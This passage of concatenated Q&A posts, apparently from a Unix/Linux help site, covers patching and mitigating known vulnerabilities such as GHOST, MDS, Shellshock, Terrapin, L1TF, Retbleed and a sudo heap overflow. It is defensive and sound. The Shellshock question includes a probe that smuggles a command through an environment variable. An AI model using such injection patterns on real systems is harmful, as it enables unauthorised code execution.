zypper in -t patch sledsp3-glibc-10206

Finally, run the following on any SUSE Linux version to bring your system up to date:
zypper patch

openSUSE Linux
To see a list of available updates including glibc on an openSUSE Linux system, enter:
zypper lu

To simply update installed glibc packages with their newer available versions, run:
zypper up

Nearly every program running on your machine uses glibc. You need to restart every service or app that uses glibc to ensure the patch takes effect. Therefore, a reboot is recommended.

How to restart init without restarting or affecting the system?
telinit u

From man telinit: "U or u requests that the init(8) daemon re-execute itself. This is not recommended since Upstart is currently unable to preserve its state, but is necessary when upgrading system libraries."

A way to immediately mitigate the threat in a limited manner is to disable reverse DNS checks in all your public-facing services. For example, you can disable reverse DNS checks in SSH by setting UseDNS to no in your /etc/ssh/sshd_config.
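As an illustration of the UseDNS change, here is a hypothetical one-liner (the sed pattern, backup suffix, and service name are assumptions; adapt them to your distro and back up the file first):

```shell
# Hypothetical sketch: flip an existing (possibly commented-out) UseDNS line
# to "UseDNS no" in sshd_config, keeping a .bak backup; append the directive
# if none exists, then reload sshd so it takes effect.
sudo sed -i.bak 's/^#\?UseDNS.*/UseDNS no/' /etc/ssh/sshd_config
grep -q '^UseDNS' /etc/ssh/sshd_config || \
    echo 'UseDNS no' | sudo tee -a /etc/ssh/sshd_config
sudo service ssh reload   # or: sudo systemctl reload sshd
```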
Sources (and more information):

https://access.redhat.com/articles/1332213
http://www.cyberciti.biz/faq/cve-2015-0235-patch-ghost-on-debian-ubuntu-fedora-centos-rhel-linux/
http://www.openwall.com/lists/oss-security/2015/01/27/9
https://security.stackexchange.com/questions/80210/ghost-bug-is-there-a-simple-way-to-test-if-my-system-is-secure
http://bobcares.com/blog/ghost-hunting-resolving-glibc-remote-code-execution-vulnerability-cve-2015-0235-in-centos-red-hat-ubuntu-debian-and-suse-linux-servers
https://community.qualys.com/blogs/laws-of-vulnerabilities/2015/01/27/the-ghost-vulnerability
https://security-tracker.debian.org/tracker/CVE-2015-0235
|
Does the Ghost Vulnerability require access (as in being a logged-in user) to the affected OS in question? Can someone clarify the 'remote attacker that is able to make an application call'? I only seem to find tests to run on the local system directly, but not from a remote host.
All the information I have gathered so far about the Ghost Vulnerability from multiple sources (credits to those sources) I have posted below in an answer in case anyone else is curious.
Edit, I found my answer:

During a code audit Qualys researchers discovered a buffer overflow in
the __nss_hostname_digits_dots() function of glibc. This bug can be
triggered both locally and remotely via all the gethostbyname*()
functions. Applications have access to the DNS resolver primarily
through the gethostbyname*() set of functions. These functions convert
a hostname into an IP address.
|
Ghost Vulnerability - CVE-2015-0235
|
Can I do anything further to protect my system, and if so, what should my next steps be?

You can do something further to protect your system: you can disable SMT (hyperthreading). This is usually possible in your system’s firmware setup.

Do I need to take action regarding my Microarchitectural Data Sampling (MDS) status?

That depends on what you use your system for. As a general rule, if you only run trusted applications with trusted content, you don’t need to take further action. (The jury is still out regarding web browsers’ vulnerability to MDS with SMT.) If you run VMs or containers with unvetted contents, you might be at risk.
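For reference, a quick sketch of inspecting the MDS status and the SMT knob from a shell (these sysfs paths are the standard Linux interface; the commented echo requires root and only lasts until reboot):

```shell
# Show the kernel's MDS assessment and the current SMT state.
cat /sys/devices/system/cpu/vulnerabilities/mds
cat /sys/devices/system/cpu/smt/control        # e.g. "on", "off", "forceoff"

# To disable SMT at runtime (as root; reverts on reboot unless made
# persistent via firmware setup or a boot parameter such as nosmt):
# echo off > /sys/devices/system/cpu/smt/control
```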
|
My dmesg output contains the following line:
[    0.265021] MDS CPU bug present and SMT on, data leak possible. See https://www.kernel.org/doc/html/latest/admin-guide/hw-vuln/mds.html for more details.

Having gone to the above-mentioned site and having read up on MDS a little, I ran/received the following:
$ cat /sys/devices/system/cpu/vulnerabilities/mds
Mitigation: Clear CPU buffers; SMT vulnerable
According to the site, this translates to:

'Mitigation: Clear CPU buffers' ... The processor is vulnerable and the
CPU buffer clearing mitigation is enabled.
'SMT vulnerable' ... SMT is enabled

I don't have a lot of experience in computing, but from what I can tell (and please correct me if I'm wrong), my system is doing what it can to protect against MDS.
My question is:
Can I do anything further to protect my system, and if so, what should my next steps be?
|
Do I need to take action regarding my Microarchitectural Data Sampling (MDS) status?
|
According to LWN there is a mitigation which can be used while you do not have a patched kernel:

there is a mitigation available in the form of the
tcp_challenge_ack_limit sysctl knob. Setting that value
to something enormous (e.g. 999999999) will make it
much harder for attackers to exploit the flaw.

You should set it by creating a file in /etc/sysctl.d and then applying it with sysctl --system. Open a terminal (press Ctrl+Alt+T), and run:

sudo -i
echo "# CVE-2016-5696
net.ipv4.tcp_challenge_ack_limit = 999999999
" > /etc/sysctl.d/security.conf
sysctl --system
exit

By the way, you can track the state of this vulnerability on Debian in the security tracker.
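A compact sketch of persisting and then reading back the knob (the drop-in filename here is an arbitrary example; the sysctl may be absent on kernels new enough to carry the real fix):

```shell
# Write a sysctl.d drop-in (run as root), reload all sysctl config,
# then read the value back to confirm it took effect.
printf 'net.ipv4.tcp_challenge_ack_limit = 999999999\n' \
    > /etc/sysctl.d/90-cve-2016-5696.conf
sysctl --system                                  # re-reads /etc/sysctl.d/*
sysctl net.ipv4.tcp_challenge_ack_limit 2>/dev/null \
    || echo "knob absent: kernel is likely already patched"
```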
|
According to cve.mitre.org, the Linux kernel before 4.7 is vulnerable to “Off-path” TCP exploits.

Description
net/ipv4/tcp_input.c in the Linux kernel before 4.7 does not properly determine the rate of challenge ACK segments, which makes it easier for man-in-the-middle attackers to hijack TCP sessions via a blind in-window attack.

This vulnerability is considered dangerous because the attacker just needs an IP address to perform an attack.
Is upgrading the Linux kernel to the latest stable version, 4.7.1, the only way to protect my system?
|
How do I protect my system against the Off-path TCP exploit in Linux?
|
This is not an issue for OpenSSH since it doesn't make use of SSL.
excerpt - What is the difference between SSL vs SSH? Which is more secure?

They differ on the things which are around the tunnel. SSL
traditionally uses X.509 certificates for announcing server and client
public keys; SSH has its own format. Also, SSH comes with a set of
protocols for what goes inside the tunnel (multiplexing several
transfers, performing password-based authentication within the tunnel,
terminal management...) while there is no such thing in SSL, or, more
accurately, when such things are used in SSL they are not considered
to be part of SSL (for instance, when doing password-based HTTP
authentication in a SSL tunnel, we say that it is part of "HTTPS", but
it really works in a way similar to what happens with SSH).
Conceptually, you could take SSH and replace the tunnel part with the
one from SSL. You could also take HTTPS and replace the SSL thing with
SSH-with-data-transport and a hook to extract the server public key
from its certificate. There is no scientific impossibility and, if
done properly, security would remain the same. However, there is no
widespread set of conventions or existing tools for that.

As further evidence I'd direct you to RFC 4253, which describes "The Secure Shell (SSH) Transport Layer Protocol". This is SSH's own custom transport layer; it does not use the same one that HTTPS/SSL uses.

This document describes the SSH transport layer protocol, which
typically runs on top of TCP/IP. The protocol can be used as a basis
for a number of secure network services. It provides strong
encryption, server authentication, and integrity protection. It may
also provide compression.

Lastly, this Q&A from the security SE site titled SSL3 “Poodle” Vulnerability had this to say about the POODLE attack.
excerpt

The Poodle attack works in a chosen-plaintext context, like BEAST and
CRIME before it. The attacker is interested in data that gets
protected with SSL, and he can:

inject data of his own before and after the secret value that he wants to
obtain;
inspect, intercept and modify the resulting bytes on the wire.

The main and about only plausible scenario where such conditions are
met is a Web context: the attacker runs a fake WiFi access point, and
injects some Javascript of his own as part of a Web page (HTTP, not
HTTPS) that the victim browses. The evil Javascript makes the browser
send requests to a HTTPS site (say, a bank Web site) for which the
victim's browser has a cookie. The attacker wants that cookie.

So there is no action that needs to be taken for OpenSSH against this particular threat.
References

How POODLE Happened
Taxonomy of Ciphers/MACs/Kex available in SSH?
Secure Configuration of Ciphers/MACs/Kex available in SSH

More reading

SSL3 “Poodle” Vulnerability
|
In the wake of the newly-discovered POODLE vulnerability, I'd like to disable SSLv3 on all of my SSH servers. How do I achieve this with OpenSSH?
|
How do I disable SSLv3 in an OpenSSH SSH server to avoid POODLE?
|
No, you could not say it's safe.
https://www.ibm.com/blogs/psirt/potential-impact-processors-power-family/

Complete mitigation of this vulnerability for Power Systems clients involves installing patches to both system firmware and operating systems. The firmware patch provides partial remediation to these vulnerabilities and is a pre-requisite for the OS patch to be effective.
[...]
Firmware patches for POWER7+, POWER8, and POWER9 platforms are now available via FixCentral. POWER7 patches will be available beginning February 7.
[...]
AIX patches will be available beginning January 26 and will continue to be rolled out through February 12.

Update: patches available, http://aix.software.ibm.com/aix/efixes/security/spectre_meltdown_advisory.asc
|
Since Intel, AMD and ARM are affected by the Spectre and Meltdown CPU kernel memory leak bugs/flaws, can we say that the Power architecture is safe from these?
|
Is AIX/Power safe from Spectre / Meltdown?
|
gpg --passphrase $my_passphrase

My question: is this safe? Will the variable $my_passphrase and/or the decrypted output be visible/accessible in some way?

No, that's not really considered safe. The passphrase will be visible in the output of ps, just like all other running processes' command lines. The data itself will not be visible; the pipe is not accessible to other users.
The man page for gpg has this to say about --passphrase:

--passphrase string
    Use string as the passphrase. This can only be used if only one passphrase is supplied. Obviously, this is of very questionable security on a multi-user system. Don't use this option if you can avoid it.

Of course, if you have no other users on the system and trust none of your services have been compromised, there should be no-one looking at the process list.
But in any case, you could instead use --passphrase-fd and have the shell redirect the passphrase to the program. Using here-strings:
#!/bin/bash
read -e -s -p "Enter passphrase: " my_passphrase
echo # 'read -s' doesn't print a newline, so do it here
gpg --passphrase-fd 3 3<<< "$my_passphrase" --decrypt "$my_file" |
stream_editing_command |
gpg --yes --output "$my_file" --passphrase-fd 3 3<<< "$my_passphrase" --symmetric

Note that that only works if the second gpg doesn't truncate the output file before getting the full input. Otherwise the first gpg might not get to read the file before it's truncated.

To avoid using the command line, you could also store the passphrase in a file, and then use --passphrase-file. But you'd then need to be careful about setting up the access permissions of the file, to remove it afterwards, and to choose a proper location for it so that the passphrase doesn't actually get stored on persistent storage.
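To see why command-line arguments are considered leaky, here is a hypothetical demonstration using sleep as a stand-in for gpg, so no real passphrase is exposed:

```shell
# Start a long-running command whose argument plays the role of a secret.
sleep 30 &
pid=$!

# Any user on the system can read its full argument list:
ps -o args= -p "$pid"    # prints: sleep 30

kill "$pid"
```

The same ps invocation against a real `gpg --passphrase ...` process would print the passphrase verbatim, which is exactly what --passphrase-fd avoids.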
|
Notice: the very same vulnerability has been discussed in this question, but the different setting of the problem (in my case I don't need to store the passphrase) allows for a different solution (i.e. using file descriptors instead of saving the passphrase in a file, see ilkkachu's answer).
Suppose I have a symmetrically encrypted file my_file (with gpg 1.x), in which I store some confidential data, and I want to edit it using the following script:
read -e -s -p "Enter passphrase: " my_passphrase
gpg --passphrase $my_passphrase --decrypt $my_file | stream_editing_command | gpg --yes --output $my_file --passphrase $my_passphrase --symmetric
unset my_passphraseWhere stream_editing_command substitutes/appends something to the stream.
My question: is this safe? Will the variable $my_passphrase and/or the decrypted output be visible/accessible in some way? If it isn't safe, how should I modify the script?
|
Security of bash script involving gpg symmetric encryption
|
This sounds like a big scary attack, but it's an easy fix. To mitigate the attack, see my Thwarting the Terrapin Attack article for SSH configuration details. Specifically, you need to block the ETM HMACs and ChaCha20 cipher as follows:
For recent RHEL-based Linux systems (Alma, Rocky, Oracle, etc.), this will work:
# cat /etc/crypto-policies/policies/modules/TERRAPIN.pmod
cipher@ssh = -CHACHA20*
ssh_etm = 0

# update-crypto-policies --set DEFAULT:TERRAPIN
Setting system policy to DEFAULT:TERRAPIN
Note: System-wide crypto policies are applied on application start-up.
It is recommended to restart the system for the change of policies
to fully take place.

Alternatively, you can force AES-GCM, which is not vulnerable, if your system doesn't have (or doesn't use) update-crypto-policies (e.g., as noted by @StephenKitt, Debian/Ubuntu may not use crypto-policies by default):
# cat /etc/ssh/sshd_config
[...]
Ciphers aes256-gcm@openssh.com,aes128-gcm@openssh.com

Then test with the testing tool provided by the original researchers.
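Before editing the config, you can ask your OpenSSH build which cipher and MAC names it recognizes (`ssh -Q` is a standard query in modern OpenSSH); a quick sketch:

```shell
# List the AES-GCM ciphers and ETM MACs relevant to the mitigation above.
ssh -Q cipher | grep -i gcm    # the non-vulnerable ciphers to allow
ssh -Q mac | grep -i etm       # the ETM MACs the mitigation blocks
```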
|
The Terrapin Attack on SSH details a "prefix truncation attack targeting the SSH protocol. More precisely, Terrapin breaks the integrity of SSH's secure channel. By carefully adjusting the sequence numbers during the handshake, an attacker can remove an arbitrary amount of messages sent by the client or server at the beginning of the secure channel without the client or server noticing it."
How would you change the SSH configuration to mitigate this attack?
|
How do you mitigate the Terrapin SSH attack?
|
To get updates on older releases you will probably need to add the Debian 6.0 (Squeeze) LTS repository to your sources.list.
To add this repository, edit /etc/apt/sources.list and add the following line to the end of the file.
deb http://ftp.us.debian.org/debian squeeze-lts main non-free contrib

Then run:
apt-get update

You should see some new sources in the list of repositories now as the update is running. Now just:
apt-get install --only-upgrade bash

Here is a listing of my sources.list file from a Squeeze server I just upgraded:
deb http://ftp.us.debian.org/debian/ squeeze main
deb-src http://ftp.us.debian.org/debian/ squeeze main

deb http://security.debian.org/ squeeze/updates main
deb-src http://security.debian.org/ squeeze/updates main

# squeeze-updates, previously known as 'volatile'
deb http://ftp.us.debian.org/debian/ squeeze-updates main
deb-src http://ftp.us.debian.org/debian/ squeeze-updates main

# Other - Adding the lts source for security updates
deb http://http.debian.net/debian/ squeeze-lts main contrib non-free
deb-src http://http.debian.net/debian/ squeeze-lts main contrib non-free
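After the upgrade, re-run the canonical test from the question; on a patched bash the function-in-environment trick no longer executes:

```shell
# A patched bash prints only "hello"; a vulnerable one also prints
# "vulnerable" before it.
env x='() { :;}; echo vulnerable' bash -c 'echo hello'
```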
|
I upgraded my old Debian 6.0 (Squeeze) server, but the vulnerability still seems to be there:
$ env x='() { :;}; echo vulnerable' bash -c 'echo hello'
vulnerable
hello

How do I upgrade Bash to a newer version on Debian 6.0 (Squeeze)?
|
Bash vulnerability CVE-2014-6271 (Shellshock) fix on Debian 6.0 (Squeeze) [duplicate]
|
The list of versions you’re looking at only documents versions of sudo released by the sudo project itself. Distributions such as Ubuntu typically add patches to address such security vulnerabilities, instead of upgrading to the latest version of sudo.
To determine whether your version is affected, you need to look at the security information provided by your distribution; in this instance, the relevant notice is USN-4705-1, which indicates that your version is fixed.
You can also look at the package changelog, in /usr/share/doc/sudo/changelog.Debian.gz; this should list the CVEs addressed by the version currently installed on your system (if any):
* SECURITY UPDATE: dir existence issue via sudoedit race
- debian/patches/CVE-2021-23239.patch: fix potential directory existing
info leak in sudoedit in src/sudo_edit.c.
- CVE-2021-23239
* SECURITY UPDATE: heap-based buffer overflow
- debian/patches/CVE-2021-3156-pre1.patch: check lock record size in
plugins/sudoers/timestamp.c.
- debian/patches/CVE-2021-3156-pre2.patch: sanity check size when
converting the first record to TS_LOCKEXCL in
plugins/sudoers/timestamp.c.
- debian/patches/CVE-2021-3156-1.patch: reset valid_flags to
MODE_NONINTERACTIVE for sudoedit in src/parse_args.c.
- debian/patches/CVE-2021-3156-2.patch: add sudoedit flag checks in
plugin in plugins/sudoers/policy.c.
- debian/patches/CVE-2021-3156-3.patch: fix potential buffer overflow
when unescaping backslashes in plugins/sudoers/sudoers.c.
- debian/patches/CVE-2021-3156-4.patch: fix the memset offset when
converting a v1 timestamp to TS_LOCKEXCL in
plugins/sudoers/timestamp.c.
- debian/patches/CVE-2021-3156-5.patch: don't assume that argv is
allocated as a single flat buffer in src/parse_args.c.
- CVE-2021-3156
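The changelog check described above can be scripted; a minimal sketch (the path is the one given in the answer; absence of the CVE means you should consult USN-4705-1 directly):

```shell
# Report whether the installed sudo package's Debian changelog mentions
# the backported fix for the heap overflow.
if zcat /usr/share/doc/sudo/changelog.Debian.gz 2>/dev/null \
        | grep -q 'CVE-2021-3156'; then
    echo "CVE-2021-3156 fix present"
else
    echo "fix not listed; check USN-4705-1"
fi
```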
|
I have some servers running Ubuntu 18.04.5 LTS
In the last update of the sudo package I can see that sudo:amd64 1.8.21p2-3ubuntu1.4 was installed on 26/01/2021 (the same day that the heap-based buffer overflow in sudo vulnerability, CVE-2021-3156, was published).
As per this list, sudo version 1.8.21p2 is impacted by this vulnerability.
However, if I run the test command to check if the systems are vulnerable, I get:
# sudoedit -s /
usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ...

Which is the output when the system is not impacted by this vulnerability.
Are my systems vulnerable or not? Is there any inconsistency between the version list and the command output?
|
Heap-based buffer overflow in Sudo vulnerability - sudo version impacted?
|
I did a little bit of digging, and this vulnerability in the documentation is referred to as:
L1TF = L1 Terminal Fault
Actually I found the kernel documentation directly, a quote:
l1tf=   [X86] Control mitigation of the L1TF vulnerability on
        affected CPUs

        The kernel PTE inversion protection is unconditionally
        enabled and cannot be disabled.

        full
                Provides all available mitigations for the
                L1TF vulnerability. Disables SMT and
                enables all mitigations in the
                hypervisors, i.e. unconditional L1D flush.

                SMT control and L1D flush control via the
                sysfs interface is still possible after
                boot. Hypervisors will issue a warning
                when the first VM is started in a
                potentially insecure configuration,
                i.e. SMT enabled or L1D flush disabled.

        full,force
                Same as 'full', but disables SMT and L1D
                flush runtime control. Implies the
                'nosmt=force' command line option.
                (i.e. sysfs control of SMT is disabled.)

        flush
                Leaves SMT enabled and enables the default
                hypervisor mitigation, i.e. conditional
                L1D flush.

                SMT control and L1D flush control via the
                sysfs interface is still possible after
                boot. Hypervisors will issue a warning
                when the first VM is started in a
                potentially insecure configuration,
                i.e. SMT enabled or L1D flush disabled.

        flush,nosmt
                Disables SMT and enables the default
                hypervisor mitigation.

                SMT control and L1D flush control via the
                sysfs interface is still possible after
                boot. Hypervisors will issue a warning
                when the first VM is started in a
                potentially insecure configuration,
                i.e. SMT enabled or L1D flush disabled.

        flush,nowarn
                Same as 'flush', but hypervisors will not
                warn when a VM is started in a potentially
                insecure configuration.

        off
                Disables hypervisor mitigations and doesn't
                emit any warnings.
                It also drops the swap size and available
                RAM limit restriction on both hypervisor and
                bare metal.

        Default is 'flush'. For details see: Documentation/admin-guide/hw-vuln/l1tf.rst

I tried some of these options, ending up with full,force. But that is my personal choice only.

How to use

If you're asking now how to use it (what to edit), then the answer is:

Edit the following file with your favorite text editor:

/etc/default/grub

Add one of the options, for example l1tf=full,force, to this line:

GRUB_CMDLINE_LINUX_DEFAULT="... l1tf=full,force"

Update your bootloader config with:

sudo update-grub

Changes are effective after reboot:

sudo reboot

Result
In case you decide to proceed with testing this solution, you should end up with similar results:
CVE-2018-3646 aka 'Foreshadow-NG (VMM), L1 terminal fault'
* Information from the /sys interface: Mitigation: PTE Inversion; VMX: cache flushes, SMT disabled
* This system is a host running a hypervisor: YES (paranoid mode)
* Mitigation 1 (KVM)
* EPT is disabled: NO
* Mitigation 2
* L1D flush is supported by kernel: YES (found flush_l1d in /proc/cpuinfo)
* L1D flush enabled: YES (unconditional flushes)
* Hardware-backed L1D flush supported: YES (performance impact of the mitigation will be greatly reduced)
* Hyper-Threading (SMT) is enabled: NO
> STATUS: NOT VULNERABLE (L1D unconditional flushing and Hyper-Threading disabled are mitigating the vulnerability)

Stephen Kitt's notes
It's also worth reading the L1TF-specific kernel documentation, which explains the vulnerabilities and mitigations in detail, and explains how to enable and disable mitigations (including disabling SMT) at runtime, without rebooting or altering the system's configuration.
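After rebooting with the new option, a quick sanity check (standard /proc and sysfs paths on Linux):

```shell
# Confirm the boot parameter was picked up and read the kernel's verdict.
grep -o 'l1tf=[^ ]*' /proc/cmdline || echo "l1tf= not set on the cmdline"
cat /sys/devices/system/cpu/vulnerabilities/l1tf
```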
|
I used the spectre-meltdown-checker, version 0.42, without any options, which gave all-green results. But in the help page I found the --paranoid switch, which turned about half of the later CVEs red. I read what it told me: for full mitigation I would have to disable hyper-threading. That scared me a little, so I did so, leaving only one remaining red flag, CVE-2018-3646 = L1D unconditional flushing should be enabled to fully mitigate the vulnerability.

Laptop: Dell Inspiron 15 with latest BIOS (1.8.0, link for details).
Processor: Intel© Core™ i7-7700HQ (link to Intel Ark).
Linux Kernel: 4.15.0-65-generic; full uname -a:
Linux dell-7577 4.15.0-65-generic #74-Ubuntu SMP Tue Sep 17 17:06:04 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

For completeness, I add info from the help on the --paranoid switch:
--paranoid require IBPB to deem Variant 2 as mitigated
also require SMT disabled + unconditional L1D flush to deem Foreshadow-NG VMM as mitigated
also require SMT disabled to deem MDS vulnerabilities mitigated

CVE-2018-3646 aka 'Foreshadow-NG (VMM), L1 terminal fault'
* Information from the /sys interface: Mitigation: PTE Inversion; VMX: conditional cache flushes, SMT vulnerable
* This system is a host running a hypervisor: YES (paranoid mode)
* Mitigation 1 (KVM)
* EPT is disabled: NO
* Mitigation 2
* L1D flush is supported by kernel: YES (found flush_l1d in /proc/cpuinfo)
* L1D flush enabled: YES (conditional flushes)
* Hardware-backed L1D flush supported: YES (performance impact of the mitigation will be greatly reduced)
* Hyper-Threading (SMT) is enabled: YES
> STATUS: VULNERABLE (enable L1D unconditional flushing and disable Hyper-Threading to fully mitigate the vulnerability)

Actual question
Apart from disabling Hyper-Threading, how do I enable this unconditional L1D flush?
|
L1D unconditional flushing should be enabled to fully mitigate the vulnerability (CVE-2018-3646)
|
KDE bug - No mitigation. Updating to kauth >= 5.34 and kdelibs >= 4.14.32 (when released) is the solution provided by the KDE folks. Just wait for the updated port to have this problem fixed.
OpenEXR bugs - No mitigation, and the devs show no sign of fixing this soon. The best option here is to remove the package if you don't actually use it (and nothing else depends on it).
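Until the fixed versions land in the ports tree, the waiting game looks roughly like this (standard FreeBSD pkg commands; run as root):

```shell
# Refresh the repository catalogue, re-audit the installed packages,
# and upgrade once the fixed kdelibs (>= 4.14.32) appears.
pkg update
pkg audit -F
pkg upgrade kdelibs
```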
|
By checking the state of installed packages using the pkg audit -F tool on FreeBSD 11, I have found 4 vulnerabilities in the installed packages (installed through pkg): samba, OpenEXR, kdelibs and ImageMagick.
I have upgraded ImageMagick and samba to the latest version (and followed the mitigation guide for samba: adding nt pipe support = no to smb.conf).
#pkg search samba
p5-Samba-LDAP-0.05_2 Manage a Samba PDC with an LDAP Backend
p5-Samba-SIDhelper-0.0.0_3 Create SIDs based on G/UIDs
samba-nsupdate-9.8.6_1 nsupdate utility with GSS-TSIG support
samba42-4.2.14_1 Free SMB/CIFS and AD/DC server and client for Unix
samba43-4.3.13_2 Free SMB/CIFS and AD/DC server and client for Unix
samba44-4.4.13 Free SMB/CIFS and AD/DC server and client for Unix
samba45-4.5.8 Free SMB/CIFS and AD/DC server and client for Unix
samba46-4.6.2 Free SMB/CIFS and AD/DC server and client for UnixThere is no upgrade available for OpenEXR and kdelibs , the latest version is already installed.
I am using the KDE4 on FreeBSD 11 , the kdelibs vulnerability affect Linux and Unix systems with the KDE4/KDE5 desktop environment.
How can I mitigate these multiple vulnerabilities (remote code execution and local privilege escalation) on FreeBSD 11?
# pkg audit -F
vulnxml file up-to-date
ImageMagick7-7.0.3.7_1 is vulnerable:
ImageMagick -- multiple vulnerabilities
CVE: CVE-2017-9144
CVE: CVE-2017-9143
CVE: CVE-2017-9142
CVE: CVE-2017-9141
CVE: CVE-2017-8830
CVE: CVE-2017-8765
CVE: CVE-2017-8357
CVE: CVE-2017-8356
CVE: CVE-2017-8355
CVE: CVE-2017-8354
CVE: CVE-2017-8353
CVE: CVE-2017-8352
CVE: CVE-2017-8351
CVE: CVE-2017-8350
CVE: CVE-2017-8349
CVE: CVE-2017-8348
CVE: CVE-2017-8347
CVE: CVE-2017-8346
CVE: CVE-2017-8345
CVE: CVE-2017-8344
CVE: CVE-2017-8343
CVE: CVE-2017-7943
CVE: CVE-2017-7942
CVE: CVE-2017-7941
CVE: CVE-2017-7619
CVE: CVE-2017-7606
CVE: CVE-2017-7275
CVE: CVE-2017-6502
CVE: CVE-2017-6501
CVE: CVE-2017-6500
CVE: CVE-2017-6499
CVE: CVE-2017-6498
CVE: CVE-2017-6497
CVE: CVE-2017-5511
CVE: CVE-2017-5510
CVE: CVE-2017-5509
CVE: CVE-2017-5508
CVE: CVE-2017-5507
CVE: CVE-2017-5506
WWW: https://vuxml.FreeBSD.org/freebsd/50776801-4183-11e7-b291-b499baebfeaf.html

kdelibs-4.14.30_1 is vulnerable:
kauth: Local privilege escalation
CVE: CVE-2017-8422
WWW: https://vuxml.FreeBSD.org/freebsd/0baee383-356c-11e7-b9a9-50e549ebab6c.html

OpenEXR-2.2.0_7 is vulnerable:
OpenEXR -- multiple remote code execution and denial of service vulnerabilities
CVE: CVE-2017-9116
CVE: CVE-2017-9115
CVE: CVE-2017-9114
CVE: CVE-2017-9113
CVE: CVE-2017-9112
CVE: CVE-2017-9111
CVE: CVE-2017-9110
WWW: https://vuxml.FreeBSD.org/freebsd/803879e9-4195-11e7-9b08-080027ef73ec.html

samba46-4.6.2 is vulnerable:
samba -- remote code execution vulnerability
CVE: CVE-2017-7494
WWW: https://vuxml.FreeBSD.org/freebsd/6f4d96c0-4062-11e7-b291-b499baebfeaf.html

4 problem(s) in the installed packages found.
|
How to mitigate multiple vulnerabilities (remote code execution and local privilege escalation) on FreeBSD 11?
|
Running a 32-bit kernel.
If you're able to turn on CONFIG_IA32_EMULATION, then you're not running a 32-bit kernel.
You're running a 64-bit kernel. This is the correct type of kernel for you to run. No configuration change is required.
https://lore.kernel.org/lkml/Ys%[emailprotected]/

We are booting the i386 kernel on an x86 machine.
With Spectre V2 patches merged into Linux mainline we have been noticing
RETBleed: WARNING: Spectre v2 mitigation leaves CPU vulnerable to
RETBleed attacks, data leaks possible!

That's funny. I don't think that's a valid combination that should be
cared about, but I'll leave it to Pawan to comment if it is something
that is "real" to be concerned for.Yeah, so far nobody cared to fix 32bit. If someone realllllly cares
and wants to put the effort in I suppose I'll review the patches, but
seriously, you shouldn't be running 32bit kernels on Skylake / Zen
based systems, that's just silly.
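Independently of the config options, you can ask the running kernel for its own assessment via sysfs. A minimal sketch, assuming a Linux kernel recent enough to know about Retbleed (older kernels simply don't have the file):

```shell
# Query the kernel's view of the Retbleed mitigation status.
# The sysfs file only exists on kernels that report this vulnerability.
status=$(cat /sys/devices/system/cpu/vulnerabilities/retbleed 2>/dev/null \
         || echo "not reported by this kernel")
echo "retbleed: $status"
```

This is worth re-checking after each config change and reboot, since it reflects what the booted kernel actually applied.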
|
I'm updating my kernel to protect my system against the "Retbleed" exploit, and I know that affected 32-bit things haven't received the necessary mitigations. I'm wondering which 32-bit features I need to disable in the Linux kernel to be fully protected.
I've found CONFIG_X86_X32_ABI and CONFIG_IA32_EMULATION so far. I'd like to maintain the ability to execute 32-bit binaries with reduced performance, if possible. Which (or both) of these config options enable the exploit? Are there any other features I need to disable?
I'm aware that some older CPUs must disable SMT to be fully protected, but my CPU is not one of them.
|
Which 32-bit features are still vulnerable to "Retbleed" in the Linux kernel?
|
Both tools agree; by default, spectre-meltdown-checker flags vulnerabilities as fixed even when SMT is an issue. If you add the --paranoid flag you should see a number of green boxes change to red.
On your setup, all the available fixes are applied on your system, apart from disabling SMT which is your decision to make. See also Do I need to take action regarding my Microarchitectural Data Sampling (MDS) status?
Which tool you trust most depends on how recent the tests are; pulling the latest spectre-meltdown-checker will usually ensure up-to-date tests there.
|
I'm running Debian Buster (10.3) on a ThinkPad T420 (i5-2520M), with the current intel-microcode package installed. To check for known CPU vulnerabilities I used the spectre-meltdown-checker script (https://github.com/speed47/spectre-meltdown-checker), which resulted in this output:

According to the script, all CVEs related to the Microarchitectural Data Sampling (MDS) vulnerability (specified in The Linux kernel user's and administrator's guide at https://www.kernel.org/doc/html/latest/admin-guide/hw-vuln/mds.html) are fixed on my system.
What gives me pause is that cat /sys/devices/system/cpu/vulnerabilities/mds leads to Mitigation: Clear CPU buffers; SMT vulnerable, which means that "The processor is vulnerable and the CPU buffer clearing mitigation is enabled" and "SMT is enabled".
How should the outputs of the tools be interpreted, or better asked, which tool can I trust?
EDIT:
This is the output with --paranoid option enabled:
|
How to check for MDS vulnerability?
|
Linux applications almost always use dynamic linking to the C library, meaning it is not compiled into them -- it is linked at runtime. This means if you have upgraded the C library, you should not have to do anything else.
However, while it would be very unusual, it is not impossible for things to be built with a statically linked glibc. The best thing to do is just look at the documentation for the application in question. If this is the practice, it is almost certainly explicit.
You can check executables with file. It should say "dynamically linked" in the output. I think it is still possible for such a binary to then incorporate a static glibc -- but this would be incredibly obtuse. The way to double check would be:
ldd whatever | grep libc.so

Where whatever is the binary you want to check. You should get some output. If not, leave a comment here so I can eat my hat, because I don't believe anyone would create such a thing.
If you do find an actual static binary, this does not mean it necessarily used glibc. You'd have to confirm that by consulting the source tree, documentation, or developers.

I've read that some people had to revert the update because they faced segfaults in their apps.

I've seen that second- and third-hand too. I haven't actually seen a concrete description of such a case, though. I think it is very unlikely, to be honest.
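The two checks above can be combined into one small sketch; the helper name check_libc is my own, but ldd and file are the standard tools described in the answer:

```shell
# Report whether a binary uses the shared libc or is statically linked.
# check_libc is a hypothetical helper; it tries ldd first, then file.
check_libc() {
    bin=$1
    if ldd "$bin" 2>/dev/null | grep -q 'libc\.so'; then
        echo "$bin: dynamically linked against libc.so"
    elif file "$bin" 2>/dev/null | grep -q 'statically linked'; then
        echo "$bin: statically linked (check how it was built)"
    else
        echo "$bin: could not determine (no ldd/file output)"
    fi
}

check_libc /bin/sh
```

Run it over each of your own C programs; anything reported as dynamically linked picks up the patched glibc automatically.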
|
I have a CentOS 6.0 server with glibc-2.12-1.7.el6.x86_64 running many open source services and some of my own C programs.
To fix the GHOST vulnerability, I need to update it to glibc-2.12-1.149.el6_6.5.
Since the version difference seems large, I was wondering whether I need to recompile my C/C++ apps, or even some of the open source services?
How do I even test them, because testing everything is next to impossible?
I've read that some people had to revert the update because they faced segfaults in their apps.
|
Ghost vulnerability - recompile C/C++ programs?
|
At the time of writing (17 August 2023), the page for CVE-2023-38408 on the Debian security tracker says that:

Debian 10 (buster, security channel) is fixed
Debian 10 (buster) is vulnerable
Debian 11 (bullseye) is vulnerable
